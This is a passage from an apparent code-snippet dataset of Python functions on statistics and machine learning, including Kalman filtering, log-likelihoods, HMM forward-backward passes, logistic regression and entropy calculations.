KFilt(sample,fs=25):\n\t#kalman filter inputs\n \n # Dimensions of parameters:\n # 'transition_matrices': 2,\n # 'transition_offsets': 1,\n # 'observation_matrices': 2,\n # 'observation_offsets': 1,\n # 'transition_covariance': 2,\n # 'observation_covariance': 2,\n # 'initial_state_mean': 1,\n # 'initial_state_covariance': 2,\n \n n_timesteps = len(sample)\n trans_mat = []\n\n\t#mask missing values\n observations = np.ma.array(sample,mask=np.zeros(sample.shape))\n missing_loc = np.where(np.isnan(sample))\n observations[missing_loc[0][:],missing_loc[1][:]] = np.ma.masked\n\t\n\t#Import Kalman filter, inerpolate missing points and get 2nd, 3rd orde kinematics\n dt = 1./25\t#Length of each frame (should be iether 1/25 or 1/30)\t\n n_timesteps = len(sample)\n \n observation_matrix = np.array([[1,0,0,0],\n [0,1,0,0]])#np.eye(4) \n t = np.linspace(0,len(observations)*dt,len(observations))\n q = np.cov(observations.T[:2,:400])\n qdot = np.cov(np.diff(observations.T[:2,:400]))#np.cov(observations[:1,:400])\n\n h=(t[-1]-t[0])/t.shape[0]\n A=np.array([[1,0,h,.5*h**2], \n [0,1,0,h], \n [0,0,1,0],\n [0,0,0,1]]) \n\n init_mean = [sample[0],0,0] #initial mean should be close to the first point, esp if first point is human-picked and tracking starts at the beginning of a video\n observation_covariance = q*500 #ADJUST THIS TO CHANGE SMOOTHNESS OF FILTER\n init_cov = np.eye(4)*.001#*0.0026\n transition_matrix = A\n transition_covariance = np.array([[q[0,0],q[0,1],0,0],\n [q[1,0],q[1,1],0,0],\n [0,0,qdot[0,0],qdot[0,1]],\n [0,0,qdot[1,0],qdot[1,1]]])\n\n kf = KalmanFilter(transition_matrix, observation_matrix,transition_covariance,observation_covariance,n_dim_obs=2)\n\n kf = kf.em(observations,n_iter=1,em_vars=['transition_covariance','transition_matrix','observation_covariance'])\n\n #pdb.set_trace()\n \n global trans_mat, trans_cov, init_cond\n x_filt = kf.filter(observations[0])[0]#observations.T[0])[0]\n kf_means = kf.smooth(observations[0])[0]\n\t\n return kf_means,x_filt #np.column_stack((color_x[:,0],color_y[:,0],color_x[:,1],color_y[:,1])),frames", "def pre_logits(self, feats: Tuple[torch.Tensor]) -> torch.Tensor:\n # The EfficientFormerClsHead doesn't have other module, just return\n # after unpacking.\n return feats[-1]", "def llf_obs(self):\n return self.model.loglikeobs(self.params)", "def test_lfc_ml2():\n levels = np.array([1024.95703125, 1016.61474609, 1005.33056641, 991.08544922, 973.4163208,\n 951.3381958, 924.82836914, 898.25482178, 873.46124268, 848.69830322,\n 823.92553711, 788.49304199, 743.44580078, 700.50970459, 659.62017822,\n 620.70861816, 583.69421387, 548.49719238, 515.03826904, 483.24401855,\n 453.0418396, 424.36477661, 397.1505127, 371.33441162, 346.85922241,\n 323.66995239, 301.70935059, 280.92651367, 261.27053833, 242.69168091,\n 225.14237976, 208.57781982, 192.95333862, 178.22599792, 164.39630127,\n 151.54336548, 139.68635559, 128.74923706, 118.6588974, 109.35111237,\n 100.76405334, 92.84288025, 85.53556824, 78.79430389, 72.57549286,\n 66.83885193, 61.54678726, 56.66480637, 52.16108322]) * units.mbar\n temperatures = np.array([6.00750732, 5.14892578, 4.177948, 3.00268555, 1.55535889,\n -0.25527954, -1.93988037, -3.57766724, -4.40600586, -4.19238281,\n -3.71185303, -4.47943115, -6.81280518, -8.08685303, -8.41287231,\n -10.79302979, -14.13262939, -16.85784912, -19.51675415,\n -22.28689575, -24.99938965, -27.79664612, -30.90414429,\n -34.49435425, -38.438797, -42.27981567, -45.99230957,\n -49.75340271, -53.58230591, -57.30686951, -60.76026917,\n -63.92070007, -66.72470093, -68.97846985, -70.4264679,\n -71.16407776, -71.53797913, -71.64375305, -71.52735901,\n -71.53523254, -71.61097717, -71.92687988, -72.68682861,\n -74.129776, -76.02471924, -76.88977051, -76.26008606,\n -75.90351868, -76.15809631]) * units.celsius\n dewpoints = np.array([4.50012302, 3.42483997, 2.78102994, 2.24474645, 1.593485, -0.9440815,\n -3.8044982, -3.55629468, -9.7376976, -10.2950449, -9.67498302,\n -10.30486488, -8.70559597, -8.71669006, -12.66509628, -18.6697197,\n -23.00351334, -29.46240425, -36.82178497, -41.68824768, -44.50320816,\n -48.54426575, -52.50753403, -51.09564209, -48.92690659, -49.97380829,\n -51.57516098, -52.62096405, -54.24332809, -57.09109879, -60.5596199,\n -63.93486404, -67.07530212, -70.01263428, -72.9258728, -76.12271881,\n -79.49847412, -82.2350769, -83.91127014, -84.95665741, -85.61238861,\n -86.16391754, -86.7653656, -87.34436035, -87.87495422, -88.34281921,\n -88.74453735, -89.04680634, -89.26436615]) * units.celsius\n __, t_mixed, td_mixed = mixed_parcel(levels, temperatures, dewpoints)\n mixed_parcel_prof = parcel_profile(levels, t_mixed, td_mixed)\n lfc_pressure, lfc_temp = lfc(levels, temperatures, dewpoints, mixed_parcel_prof, td_mixed)\n assert_almost_equal(lfc_pressure, 962.34 * units.mbar, 2)\n assert_almost_equal(lfc_temp, 0.767 * units.degC, 2)", "def Log2T(X):\n data_headers = X.select_dtypes(include=[\"float64\"]).columns\n X[data_headers] = np.log2(X[data_headers])\n return X", "def statePosteriors(log_alpha, log_beta):\n N = log_alpha.shape[0]\n M = log_alpha.shape[1]\n log_gamma = np.zeros((N, M))\n for n in range(N):\n log_gamma[n, :] = log_alpha[n, :] + log_beta[n, :] - logsumexp(log_alpha[N-1, :])\n\n return log_gamma", "def loglweave(store):\n code = \"\"\"\n double sum = 0.0, xbeta;\n for(int i=0; i<nobs; i++){\n xbeta = 0.0;\n for(int j=0; j<kreg; j++){\n xbeta += xmat(i,j) * beta(j);\n }\n sum += yvec(i) * xbeta - exp(xbeta);\n }\n return_val = sum;\n \"\"\"\n yvec = store['yvec']\n xmat = store['xmat']\n nobs, kreg = xmat.shape\n beta = store['beta']\n val = weave.inline(code,['yvec','xmat', 'beta','nobs','kreg'],\n compiler='gcc',\n type_converters=converters.blitz\n )\n return val", "def log_filter(stack, sigma):\n stack_cp = stack.astype(np.int16)\n gauss = ndi.filters.gaussian_filter(stack_cp, sigma=sigma)\n log = ndi.filters.laplace(gauss)\n return log", "def beinflumat(x_axis, y_axis, e_eff):\n len_x = len(x_axis)\n len_y = len(y_axis)\n influence_matrix_complete = np.zeros((len_x, len_y, len_x, len_y))\n\n # generate coordinate grids\n a_factor = (x_axis[-1] - x_axis[0]) / (len_x - 1) / 2\n b_factor = (y_axis[-1] - y_axis[0]) / (len_y - 1) / 2\n x_grid = __beinflumatgrid(x_axis)\n y_grid = __beinflumatgrid(y_axis)\n\n # use numexpr to evaluate expressions\n xpa = ne.evaluate('x_grid + a_factor')\n xma = ne.evaluate('x_grid - a_factor')\n ypb = ne.evaluate('y_grid + b_factor')\n ymb = ne.evaluate('y_grid - b_factor')\n\n # calculate complete influence matrix\n for j in range(0, len_y):\n for j_prime in range(0, len_y):\n influence_matrix_complete[:, j, :, j_prime] = \\\n (np.multiply(xpa, np.log(\n np.divide(\n ((ypb[j, j_prime]) +\n np.sqrt(np.multiply((ypb[j, j_prime]),\n (ypb[j, j_prime])) +\n np.multiply(xpa, xpa))),\n ((ymb[j, j_prime]) +\n np.sqrt(np.multiply((ymb[j, j_prime]),\n (ymb[j, j_prime])) +\n np.multiply(xpa, xpa)))))) +\n (ypb[j, j_prime]) * np.log(\n np.divide(\n (xpa +\n np.sqrt(np.multiply((ypb[j, j_prime]),\n (ypb[j, j_prime])) +\n np.multiply(xpa, xpa))),\n (xma +\n np.sqrt(np.multiply((ypb[j, j_prime]),\n (ypb[j, j_prime])) +\n np.multiply(xma, xma))))) +\n np.multiply(xma, np.log(\n np.divide(\n ((ymb[j, j_prime]) +\n np.sqrt(np.multiply((ymb[j, j_prime]),\n (ymb[j, j_prime])) +\n np.multiply(xma, xma))),\n ((ypb[j, j_prime]) +\n np.sqrt(np.multiply((ypb[j, j_prime]),\n (ypb[j, j_prime])) +\n np.multiply(xma, xma)))))) +\n (ymb[j, j_prime]) * np.log(\n np.divide(\n (xma +\n np.sqrt(np.multiply((ymb[j, j_prime]),\n (ymb[j, j_prime])) +\n np.multiply(xma, xma))),\n (xpa +\n np.sqrt(np.multiply((ymb[j, j_prime]),\n (ymb[j, j_prime])) +\n np.multiply(xpa, xpa))))))\n\n return influence_matrix_complete * 1 / e_eff * 2 / pi", "def coefs(logger, model, data=clean_data, target=target):\n\n df = pd.read_csv(data)\n X = df.drop(columns=target)\n coef_df = pd.DataFrame({'Variable': X.columns, 'Coefficient': model.coef_[0]})\\\n .sort_values(by='Coefficient')\n\n coef_path = data_config['outputs']['logreg_coefs']\n coef_df.to_csv(coef_path, index=False)\n print(f'Coefficients saved to {coef_path}')\n\n return", "def front_column_model_p_gain():", "def information_gain(features, attribute_index, targets):\r\n\r\n possible_feature_values = [0,1]\r\n \r\n possible_classifications = [0,1]\r\n \r\n feature = features[:,attribute_index]\r\n \r\n \r\n number_of_samples = len(feature)\r\n \r\n import math\r\n \r\n \r\n #current_entropy = np.sum([-(len(targets[targets==possible_classification])/number_of_samples)*math.log(len(targets[targets==possible_classification])/number_of_samples, 2) for possible_classification in possible_classifications])\r\n \r\n terms_to_be_summed_for_current_entropy = []\r\n \r\n for classification in possible_classifications:\r\n \r\n number_of_elements_with_this_classification = len(targets[targets==classification])\r\n \r\n p_for_this_classification = number_of_elements_with_this_classification/len(targets)\r\n \r\n if p_for_this_classification != 0:\r\n terms_to_be_summed_for_current_entropy.append(-p_for_this_classification*math.log(p_for_this_classification,2))\r\n else:\r\n terms_to_be_summed_for_current_entropy.append(0)\r\n \r\n current_entropy = np.sum(terms_to_be_summed_for_current_entropy)\r\n \r\n \r\n \r\n terms_to_be_summed_for_weighted_entropy = []\r\n \r\n for possible_value in possible_feature_values:\r\n \r\n targets_split_by_feature_value = targets[feature.flatten() == possible_value]\r\n \r\n if len(targets_split_by_feature_value) != 0:\r\n \r\n \r\n weight_of_feature_value = len(targets_split_by_feature_value)/len(targets)\r\n \r\n terms_for_entropy_within_subset = []\r\n \r\n for classification in possible_classifications:\r\n \r\n number_of_subset_elements_with_this_classification = len(targets_split_by_feature_value[targets_split_by_feature_value==classification])\r\n \r\n p_in_subset_for_this_classification = number_of_subset_elements_with_this_classification/len(targets_split_by_feature_value)\r\n \r\n if p_in_subset_for_this_classification != 0:\r\n terms_for_entropy_within_subset.append(-p_in_subset_for_this_classification*math.log(p_in_subset_for_this_classification,2))\r\n else:\r\n terms_for_entropy_within_subset.append(0)\r\n \r\n entropy_within_subset = np.sum(terms_for_entropy_within_subset)\r\n \r\n terms_to_be_summed_for_weighted_entropy.append(weight_of_feature_value*entropy_within_subset)\r\n \r\n weighted_entropy = np.sum(terms_to_be_summed_for_weighted_entropy)\r\n \r\n \r\n #current_entropy = np.sum(terms_to_be_summed_for_current_entropy)\r\n \r\n #weighted_entropy = np.sum([(len(feature[feature==possible_value])/number_of_samples)*(len(targets[feature==possible_value][targets[feature==possible_value]==possible_classification])/len(targets[feature==possible_value]))*math.log((len(targets[feature==possible_value][targets[feature==possible_value]==possible_classification])/len(targets[feature==possible_value])), 2) for possible_classification in possible_classifications for possible_value in possible_feature_values])\r\n\r\n information_gain = current_entropy - weighted_entropy \r\n \r\n return information_gain", "def load(self, old_log):\n all_log = tflog2pandas(old_log)\n\n for _, row in all_log.iterrows():\n tag, value, step = row\n self.writer.add_scalar(tag,value,step)", "def log_mae(labels, predictions):\n\n result = abs(labels - predictions)\n result = reduce_mean(result)\n result = log(result)\n\n return result", "def calc_tf_log(doc):\r\n tf = calc_tf(doc)\r\n max_tf = tf[max(tf, key=tf.get)]\r\n tf_log = {}\r\n for key, val in tf.items():\r\n tf_log[key] = (1 + math.log(val)) / (1 + math.log(max_tf))\r\n return tf_log", "def analyse_loglike(test_data, mods):\r\n l1 = list(map(lambda x: x + ' NB', mods.names))\r\n l1.extend(list(map(lambda x: x + ' ZI', mods.names)))\r\n l1.extend(list(map(lambda x: x + ' P', mods.names)))\r\n loglikeNB = np.array(mods.compute_log_likelihood(test_data, 'NB'))\r\n loglikeZI = np.array(mods.compute_log_likelihood(test_data, 'ZI'))\r\n loglikeP = np.array(mods.compute_log_likelihood(test_data, 'P'))\r\n # loglikeG = np.array(mods.compute_log_likelihood_gaussian(test_data))\r\n # loglikegeo = np.array(mods.compute_log_likelihood_geom(test_data))\r\n LL = np.zeros((loglikeNB.shape[0] * 3, loglikeNB.shape[1]))\r\n LL[:loglikeNB.shape[0], :] = loglikeNB\r\n LL[loglikeNB.shape[0]:2 * loglikeNB.shape[0], :] = loglikeZI\r\n LL[2 * loglikeNB.shape[0]:3 * loglikeNB.shape[0], :] = loglikeP\r\n # LL[3 * loglikeNB.shape[0]:4 * loglikeNB.shape[0], :] = loglikeG\r\n # LL[4 * llzi.shape[0]:, :] = np.array(mods.loglikegeo)\r\n print('mean per model', list(zip(np.ma.masked_invalid(LL).sum(axis=1), map(lambda x: x.mod.name, mods.models))))\r\n print('mean per distrib')\r\n print(np.ma.masked_invalid(LL[:loglikeNB.shape[0], :]).mean())\r\n print(np.ma.masked_invalid(LL[loglikeNB.shape[0]:loglikeNB.shape[0] * 2, :]).mean())\r\n print(np.ma.masked_invalid(LL[loglikeNB.shape[0] * 2:loglikeNB.shape[0] * 3, :]).mean())\r\n # print(np.nanmean(LL[1-np.isinf(LL)], axis=1))\r\n # print(np.nanmean(LL[LL != np.inf],axis=1))\r\n LL[np.isnan(LL)] = 0\r\n LL[np.isinf(LL)] = 0\r\n LL[LL == 0] = -np.inf\r\n r = np.argmax(LL, axis=0)\r\n # LL /= mx\r\n print('mean_best', np.mean(np.ma.masked_invalid(LL[r, range(LL.shape[1])])))\r\n mx = np.max(LL, axis=0)\r\n LL = LL / mx\r\n means = test_data.get_miniOD(None)[test_data.get_stations_col(None)].mean(axis=0).to_numpy()\r\n # for i in np.unique(r):\r\n # print(means[r == i].max())\r\n print('mean NB', means[r < loglikeNB.shape[0]].mean())\r\n print('mean ZI', means[(r < 2 * loglikeNB.shape[0]) * (r > loglikeNB.shape[0])].mean())\r\n print('mean poisson', means[(r < 3 * loglikeNB.shape[0]) * (r > 2 * loglikeNB.shape[0])].mean())\r\n # print('mean ga', means[(r < 4 * llzi.shape[0]) * (r > 3 * llzi.shape[0])].mean())\r\n # print('mean Gaussian', means[r > 3 * loglikeNB.shape[0]].mean())\r\n print('model name, mean trips per model, LL/maxLL, N inf')\r\n for i in range(LL.shape[0]):\r\n print(l1[i], means[r == i].mean(), np.mean(np.ma.masked_invalid(LL[i, :])), np.sum(np.isinf(LL[i, :])))\r\n print(np.ma.corrcoef(np.ma.masked_invalid(LL[i, :]), means[:LL.shape[1]])[1, 0])\r\n plt.hist(r, bins=np.arange(-0.5, 3 * len(mods.names) + 1, 1))\r\n\r\n # l1.extend(list(map(lambda x: x + ' geo', mods.names)))\r\n # l1.extend(list(map(lambda x: x + ' G', mods.names)))\r\n plt.xticks(range(len(l1)), l1, rotation='vertical')\r\n plt.show()\r\n\r\n for m in mods.loglike:\r\n print(m)\r\n print(m[np.logical_not(np.isinf(m))].mean())", "def _loglike(self, y, f):\n bincoef = tf.lgamma(self.n + 1) - tf.lgamma(y + 1) \\\n - tf.lgamma(self.n - y + 1)\n ll = bincoef + y * tf.log(pos(f)) + (self.n - y) * tf.log(pos(1 - f))\n return ll", "def loglloop(store):\n suml=0.0\n for i in xrange(store['yvec'].shape[0]):\n xbeta=dot(store['xmat'][i,:],store['beta'])\n suml=suml+store['yvec'][i] * xbeta - exp(xbeta)\n return suml", "def compute_gradients(self, logits, target):\n\n target_length = target.shape[0]\n num_time_steps = logits.shape[0]\n\n\t\t######################\n\t\t### YOUR CODE HERE ###\n\t\t######################\n\n # expand labels by inserting a blank between each pair\n normalized_logits = softmax(logits)\n blank_label = normalized_logits.shape[1] - 1\n l = add_blanks(target, blank_label)\n target_length = l.shape[0]\n\n alpha = self.compute_forward_variables(normalized_logits, target) \n beta = self.compute_backward_variables(normalized_logits, target)\n\n # rescale\n alpha = alpha / np.sum(alpha, axis=0)\n beta = beta / np.sum(beta, axis=0)\n alphabeta = alpha * beta\n print \"alpha\"\n print alpha\n\n # compute zt\n z = Counter()\n for t in xrange(num_time_steps):\n for s, k in enumerate(l):\n z[t] += alphabeta[s, t] / normalized_logits[t, k]\n \n # normalized_logits is time steps t by labels k\n # alpha is 2 * target_length - 1 by time steps\n lab_zk = np.zeros_like(normalized_logits)\n for s, k in enumerate(l):\n for t in xrange(num_time_steps):\n lab_zk[t, k] += alphabeta[s, t]\n\n grad = normalized_logits\n for k in xrange(target.shape[0]):\n for t in xrange(num_time_steps):\n ytk = normalized_logits[t, k]\n constant = 1.0 / (ytk * z[t])\n grad[t, k] = ytk - constant * lab_zk[t, k]\n \n return grad", "def extrapolate_fwds(h, ufr, llfr, alpha=0.10):\n fwd_fsp_fsp_plus_h = np.log(1 + ufr) + (llfr - np.log(1 + ufr)) * big_b(h, alpha)\n return fwd_fsp_fsp_plus_h", "def logits_on_features(self, h, batch):\n batch = batch.to(h.device)\n # Extract features with the model\n features = h.view(batch.size, -1)\n # Log loss\n logits = self.head(features)\n return logits", "def compute_loglike(self, tools: ModelingTools) -> float:\n return -1.5", "def estimate_logreg(x,y,N_its,learning_rate=1e-4,regularizer=1e-2,lazy_reg=True):\n weights = defaultdict(float)\n weight_hist = [] #keep a history of the weights after each iteration\n all_labels = set(y)\n \n # this block is for lazy regularization\n ratereg = learning_rate * regularizer\n def regularize(base_feats):\n for base_feat in base_feats:\n for label in all_labels:\n #print \"regularizing\",(label,base_feat),t,last_update[base_feat],(1. - ratereg) ** (t-last_update[base_feat])\n weights[(label,base_feat)] *= (1. - ratereg) ** (t-last_update[base_feat])\n last_update[base_feat] = t\n\n t = 0\n last_update = defaultdict(int)\n\n eeta = learning_rate\n\n for it in xrange(N_its):\n\n for i,(x_i,y_i) in enumerate(zip(x,y)): #keep\n t += 1\n\n # regularization\n if lazy_reg: # lazy regularization is essential for speed\n regularize(x_i) # only regularize features in this instance\n if not lazy_reg: # for testing/explanatory purposes only\n for feat,weight in weights.iteritems():\n if feat[1] is not OFFSET: # usually don't regularize offset\n weights[feat] -= ratereg * weight\n\n p_y = compute_py(x_i,weights,all_labels) #hint\n\n term2 = make_feature_vector(x_i, y_i)\n\n for key in term2.keys():\n weights[key] = weights[key] + (term2[key]*eeta)\n\n for label in all_labels:\n temp = make_feature_vector(x_i, label)\n for key in temp.keys():\n weights[key] = weights[key] - (temp[key]*eeta*p_y[label])\n\n\n print it,\n weight_hist.append(weights.copy()) \n\n # if lazy, let regularizer catch up\n if lazy_reg:\n # iterate over base features\n regularize(list(set([f[1] for f in weights.keys() if f[1] is not OFFSET])))\n\n return weights,weight_hist", "def log_trans(data, test=False):\n logs = ['Administrative', 'Administrative_Duration', 'Informational',\n 'Informational_Duration', 'ProductRelated',\n 'ProductRelated_Duration', 'BounceRates', 'ExitRates',\n 'PageValues']\n if test:\n data_test = data.loc[data['Train'] == 0]\n data = data.loc[data['Train'] == 1]\n\n for col in logs:\n zero_val = float((min(i for i in list(data[col]) if i > 0))/2)\n data[col] = data[col].apply(lambda x: zero_val if x == 0 else x)\n data[col] = data[col].apply(lambda x: np.log(x))\n if test:\n data_test[col] = data_test[col].apply(lambda x:\n zero_val\n if x == 0 else x)\n data_test[col] = data_test[col].apply(lambda x: np.log(x))\n if test:\n data = pd.concat([data, data_test])\n return data", "def logistic(weights, data, targets, hyperparameters):\n \n t = np.transpose(np.repeat(np.reshape(weights[:-1], (len(weights)-1, 1)), len(data), axis = 1))\n f_e = data * t\n z_sums = np.sum(f_e, axis=1)\n y = sigmoid(z_sums +weights[-1])\n f = np.sum(np.log(1 + np.exp(-z_sums - weights[-1])) + (1 - np.transpose(targets)) * (z_sums + weights[-1]))\n df = np.sum(data * np.transpose(((-np.exp(-z_sums - weights[-1]) / (1 + np.exp(-z_sums - weights[-1]))) + (1 - np.transpose(targets)))), axis = 0)\n df = np.append(df, np.sum(np.transpose(((-np.exp(-z_sums - weights[-1]) / (1 + np.exp(-z_sums - weights[-1]))) + (1 - np.transpose(targets)))), axis = 0))\n df = np.reshape(df, ((len(df), 1)))\n\n return f, df, np.reshape(y, (len(y), 1))", "def _backward(n_samples, n_components, log_startprob,\n log_transmat, framelogprob, mask):\n \n bwdlattice = torch.zeros_like(framelogprob)\n # last row is already zeros, so omit the zero setting step\n for t in range(n_samples - 2, -1, -1):\n for i in range(n_components):\n work_buffer = log_transmat[i,:] + framelogprob[:,t + 1, :] + bwdlattice[:,t+1, :]\n bwdlattice[:, t, i] = torch.logsumexp(work_buffer, dim=-1) * mask[:, t+1].type(framelogprob.dtype)\n return bwdlattice", "def get_logits(image):\n x = image\n for filters in (32, 64):\n x = tf.layers.conv2d(x, filters, 3)\n x = tf.nn.relu(x)\n x = tf.layers.max_pooling2d(x, 3, 2)\n x = tf.reduce_mean(x, axis=(1, 2))\n logits = tf.layers.dense(x, 10)\n return logits", "def log_likelihood(self, data, reward_model, bias_params):", "def loglnumpy(store):\n xbeta = dot(store['xmat'], store['beta'])\n lamb = exp(xbeta)\n return sum(store['yvec'] * xbeta - lamb)", "def my_loglike(theta, x, data, sigma):\n\n model = my_model(theta, x)\n\n return -0.5*len(x)*np.log(2*math.pi*sigma**2) - (0.5/sigma**2) * np.sum((data-model)**2)", "def gradient_ascent(f, df, theta_init, step_size, max_iter):\n\n fs = []\n xs = []\n thetas = theta_init\n for i in range(max_iter): #for each data example\n fs.append(f(thetas))\n\n temp = step_size*df(thetas)\n thetas = step_size*df(thetas) #modify that feature by using the derivative of log likelihood\n xs.append(thetas.flatten())\n if i % 10 == 0:\n print(i, thetas)\n\n return thetas, fs, xs", "def logm(self, x):\n\n if K.backend() == 'theano':\n # construct theano tensor operation\n from theano.tensor.nlinalg import svd, diag\n from theano.tensor.elemwise import Elemwise\n from theano.scalar import log\n import theano.tensor as T\n # This implementation would be extremely slow. but efficient?\n u, d, v = svd(x)\n d += self.eps\n inner = diag(T.log(d))\n res = T.dot(u, T.dot(inner, v))\n return res\n else:\n from kyu.tensorflow.ops.svd_gradients import batch_matrix_log\n return batch_matrix_log(x, self.eps)", "def calcfeat_delta_delta(signal, samplerate=16000, win_length=0.025, win_step=0.01, filters_num=26, NFFT=512,\n\t\t\t\t\t\t low_freq=0, high_freq=None, pre_emphasis_coeff=0.97, cep_lifter=22, appendEnergy=True,\n\t\t\t\t\t\t mode='mfcc', feature_len=13):\n\tfilters_num = 2 * feature_len\n\tfeat = calcMFCC(signal, samplerate, win_length, win_step, feature_len, filters_num, NFFT, low_freq, high_freq,\n\t\t\t\t\tpre_emphasis_coeff, cep_lifter, appendEnergy, mode=mode) # 首先获取13个一般MFCC系数\n\tfeat_delta = delta(feat)\n\tfeat_delta_delta = delta(feat_delta)\n\n\tresult = numpy.concatenate((feat, feat_delta, feat_delta_delta), axis=1)\n\treturn result", "def _forward(n_samples, n_components, log_startprob,\n log_transmat, batch_framelogprob, mask):\n\n batch_size = batch_framelogprob.shape[0]\n fwdlattice = torch.zeros_like(batch_framelogprob)\n \n fwdlattice[:, 0, :] = log_startprob + batch_framelogprob[:,0, :]\n for t in range(1, n_samples):\n for j in range(n_components):\n work_buffer = fwdlattice[:, t-1, :] + log_transmat[:, j]\n # fwdlattice[:,t, j] = torch.logsumexp(work_buffer, dim=-1) + \\\n # framelogprob[:,t, j] \n \n fwdlattice[:,t, j] = torch.logsumexp(work_buffer, dim=-1) * \\\n mask[:, t].type(batch_framelogprob.dtype) + batch_framelogprob[:,t, j] \n\n # need to find the idx for last sample of each sequence by mask.sum(dim=-1)-1, fwdlattice[:, -1, :] would give the padded zeros\n batch_logprob = torch.logsumexp(fwdlattice[list(range(batch_size)), mask.sum(dim=-1)-1, :], dim=-1)\n return batch_logprob, fwdlattice", "def M(f):\n return 1127 * numpy.log(1 + f/700.0)", "def loglike(self, params):\n\n if type(params) is not MixedLMParams:\n params = MixedLMParams.from_packed(params, self.k_fe,\n self.use_sqrt)\n\n fe_params = params.get_fe_params()\n cov_re = params.get_cov_re()\n try:\n cov_re_inv = np.linalg.inv(cov_re)\n except np.linalg.LinAlgError:\n cov_re_inv = None\n _, cov_re_logdet = np.linalg.slogdet(cov_re)\n\n # The residuals\n expval = np.dot(self.exog, fe_params)\n resid_all = self.endog - expval\n\n likeval = 0.\n\n # Handle the covariance penalty\n if self.cov_pen is not None:\n likeval -= self.cov_pen.func(cov_re, cov_re_inv)\n\n # Handle the fixed effects penalty\n if self.fe_pen is not None:\n likeval -= self.fe_pen.func(fe_params)\n\n xvx, qf = 0., 0.\n for k, lab in enumerate(self.group_labels):\n\n exog = self.exog_li[k]\n ex_r = self.exog_re_li[k]\n ex2_r = self.exog_re2_li[k]\n resid = resid_all[self.row_indices[lab]]\n\n # Part 1 of the log likelihood (for both ML and REML)\n ld = _smw_logdet(1., ex_r, ex2_r, cov_re, cov_re_inv,\n cov_re_logdet)\n likeval -= ld / 2.\n\n # Part 2 of the log likelihood (for both ML and REML)\n u = _smw_solve(1., ex_r, ex2_r, cov_re, cov_re_inv, resid)\n qf += np.dot(resid, u)\n\n # Adjustment for REML\n if self.reml:\n mat = _smw_solve(1., ex_r, ex2_r, cov_re, cov_re_inv,\n exog)\n xvx += np.dot(exog.T, mat)\n\n if self.reml:\n likeval -= (self.n_totobs - self.k_fe) * np.log(qf) / 2.\n _,ld = np.linalg.slogdet(xvx)\n likeval -= ld / 2.\n likeval -= (self.n_totobs - self.k_fe) * np.log(2 * np.pi) / 2.\n likeval += ((self.n_totobs - self.k_fe) *\n np.log(self.n_totobs - self.k_fe) / 2.)\n likeval -= (self.n_totobs - self.k_fe) / 2.\n else:\n likeval -= self.n_totobs * np.log(qf) / 2.\n likeval -= self.n_totobs * np.log(2 * np.pi) / 2.\n likeval += self.n_totobs * np.log(self.n_totobs) / 2.\n likeval -= self.n_totobs / 2.\n\n return likeval", "def f_log_encoding(x, in_reflection=False):\n a = 0.555556\n b = 0.009468\n c = 0.344676\n d = 0.790453\n e = 8.735631\n f = 0.092864\n cut1 = 0.00089\n\n if not in_reflection:\n x = x * 0.9\n\n y = np.where(x < cut1,\n e * x + f,\n c * np.log10(a * x + b) + d)\n\n return y", "def log_det_Jxz(self):\n #return self.log_det_xz.output\n log_det_Jxzs = []\n for l in self.layers:\n if hasattr(l, 'log_det_Jxz'):\n log_det_Jxzs.append(l.log_det_Jxz)\n if len(log_det_Jxzs) == 0:\n return tf.ones((self.output_z.shape[0],))\n if len(log_det_Jxzs) == 1:\n return log_det_Jxzs[0]\n return tf.reduce_sum(log_det_Jxzs, axis=0, keepdims=False)", "def test_l2_metric_log_vectorization(\n self, l2_metric_s2, times, landmarks_a, landmarks_b, landmarks_c\n ):\n landmarks_ab = l2_metric_s2.geodesic(landmarks_a, landmarks_b)\n landmarks_bc = l2_metric_s2.geodesic(landmarks_b, landmarks_c)\n landmarks_ab = landmarks_ab(times)\n landmarks_bc = landmarks_bc(times)\n\n tangent_vecs = l2_metric_s2.log(point=landmarks_bc, base_point=landmarks_ab)\n\n result = tangent_vecs\n self.assertAllClose(gs.shape(result), gs.shape(landmarks_ab))", "def kullbackLeibler(mu, log_sigma):\n # (tf.Tensor, tf.Tensor) -> tf.Tensor\n # = -0.5 * (1 + log(sigma**2) - mu**2 - sigma**2)\n return -0.5 * tf.reduce_sum(1 + 2 * log_sigma - mu**2 - tf.exp(2 * log_sigma), 1)", "def log_shift(data):\n result = [np.log(1 + np.abs(d.copy())) for d in data]\n return result", "def log_boltzmann_dist(Q, temperature):\n return nn.LogSoftmax(dim=0)(Q/temperature)", "def removeFactors(self,flist, isLog=False):\n # Currently: just divide out factors (add inverse factors) -- can't check if factor present? (minimal)\n # TODO: set entries to zero, then call self.L.eliminate_zeros()\n row = np.zeros(2*len(flist),dtype=int)-1; col=row.copy(); data=np.zeros(2*len(flist));\n for k,f in enumerate(flist):\n if not isLog: \n if np.any(f.t==0): f = f+1e-30; # TODO: log nonzero tol\n f = f.log()\n if f.nvar == 1:\n Xi = f.vars[0]\n self.h[Xi] -= .5*(f[1]-f[0])\n self.c -= .5*(f[1]+f[0])\n else:\n Xi,Xj = f.vars[0],f.vars[1]\n row[2*k],col[2*k],data[2*k] = int(Xi),int(Xj), .25*(f[1,1]+f[0,0]-f[0,1]-f[1,0])\n row[2*k+1],col[2*k+1],data[2*k+1] = col[2*k],row[2*k],data[2*k] \n #L[Xi,Xj] += .25*(f[1,1]+f[0,0]-f[0,1]-f[1,0])\n self.h[Xi] -= .5*(f[1,0]-f[0,0])+data[2*k] #L[Xi,Xj]\n self.h[Xj] -= .5*(f[0,1]-f[0,0])+data[2*k] #L[Xi,Xj]\n self.c -= .25*(f[1,1]+f[1,0]+f[0,1]+f[0,0])\n self.L -= csr((data[row>=0],(row[row>=0],col[row>=0])),shape=(self.nvar,self.nvar)); \n #raise NotImplementedError();", "def started_log(X,params):\n \n offset = params['offset']\n if not is_number(params['offset']):\n offset=1.\n X = np.log(X+offset)\n return X", "def binlogreg_train(X, Y_):\n N = X.shape[0]\n\n w = np.random.randn(X.shape[1], 1) # D x 1\n b = np.random.randn(N, 1) # N x 1\n\n for i in range(PARAM_NITER+1):\n # klasifikacijski rezultati\n scores = np.dot(X, w) + b # N x 1\n\n # vjerojatnosti razreda c_1\n probs = sigmoid(scores, y=1) # N x 1\n\n # gubitak\n loss = -1 * float(np.dot(Y_.T, np.log(probs))) # scalar\n\n # dijagnostički ispis\n if i % 10 == 0:\n print(\"iteration {}: loss {}\".format(i, loss))\n\n # if i % 1000 == 0:\n # Y = np.around(probs, decimals=0)\n # decfun = binlogreg_decfun(w, b)\n # bbox = (np.min(X, axis=0), np.max(X, axis=0))\n # 